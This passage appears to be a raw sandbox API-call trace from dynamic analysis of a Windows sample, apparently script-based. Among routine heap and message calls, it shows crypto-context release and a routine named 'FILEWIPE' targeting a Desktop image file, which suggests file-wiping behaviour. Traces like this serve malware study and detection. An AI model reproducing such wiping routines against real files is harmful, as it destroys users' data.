lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0166.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x90d440, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.898] GetProcAddress (hModule=0x74f20000, lpProcName="CryptReleaseContext") returned 0x74f2e124 [0166.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0166.899] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0166.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0166.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.900] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.900] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0166.901] FreeLibrary (hLibModule=0x74f20000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0166.901] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0166.901] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0166.901] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0166.901] CloseHandle (hObject=0x138) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0166.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0166.902] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0166.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0166.902] CloseHandle (hObject=0x120) returned 1 [0166.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0166.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0166.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0166.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0166.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0166.905] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.908] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.908] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0166.908] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.909] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf556c8a0, ftCreationTime.dwHighDateTime=0x1d5da4d, ftLastAccessTime.dwLowDateTime=0xfb4c46b0, ftLastAccessTime.dwHighDateTime=0x1d5e51d, ftLastWriteTime.dwLowDateTime=0xfb4c46b0, ftLastWriteTime.dwHighDateTime=0x1d5e51d, nFileSizeHigh=0x0, nFileSizeLow=0x1565f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="R4ko9W2ZwNtIqWlJH0ER.gif", cAlternateFileName="R4KO9W~1.GIF")) returned 0x90af58 [0166.910] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0166.910] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.910] CharLowerBuffW (in: lpsz="byte[87647]", cchLength=0xb | out: lpsz="byte[87647]") returned 0xb [0166.911] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.911] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0166.911] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.911] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0166.912] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0166.912] FreeLibrary (hLibModule=0x75c90000) returned 1 [0166.912] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0166.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0166.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0166.912] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0166.912] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0166.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0166.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0166.912] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0166.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0166.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.915] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0166.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0166.916] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0166.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0166.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0166.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 